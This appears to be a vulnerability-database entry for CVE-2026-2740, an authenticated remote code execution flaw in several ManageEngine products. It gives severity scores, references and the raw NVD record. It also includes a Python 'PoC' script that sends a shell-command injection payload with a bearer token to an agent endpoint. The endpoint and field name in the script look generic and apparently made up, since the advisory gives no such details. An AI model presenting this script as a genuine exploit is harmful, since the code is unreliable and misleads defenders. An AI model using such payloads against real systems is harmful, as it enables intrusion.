CVE-2026-2740

Description

Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Zohocorp ManageEngine ADSelfService Plus < 6525

Zohocorp ManageEngine DataSecurity Plus < 6264

Zohocorp ManageEngine RecoveryManager Plus < 6313

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable agent endpoint
target_url = "http://target-server:8080/agent/api"

# Valid authentication credentials or session token
auth_header = {
    "Authorization": "Bearer <valid_low_priv_token>"
}

# Malicious payload exploiting the 3rd party dependency bug
# This attempts to execute a shell command (e.g., whoami)
exploit_payload = {
    "config": {
        "dependency_field": "; /bin/sh -c 'whoami'"
    }
}

try:
    response = requests.post(target_url, json=exploit_payload, headers=auth_header, verify=False)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the command was executed on the agent machine.")
        print("Response:", response.text)
    else:
        print("[-] Failed to send request.")
        print("Status Code:", response.status_code)
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2740
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2740
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2740/
[4] VulDB https://vuldb.com/cve/CVE-2026-2740
[5] https://www.manageengine.com/products/self-service-password/advisory/CVE-2026-2740.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2740", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2026-05-21T14:16:44.850", "lastModified": "2026-05-21T15:26:35.653", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://www.manageengine.com/products/self-service-password/advisory/CVE-2026-2740.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02"}]}}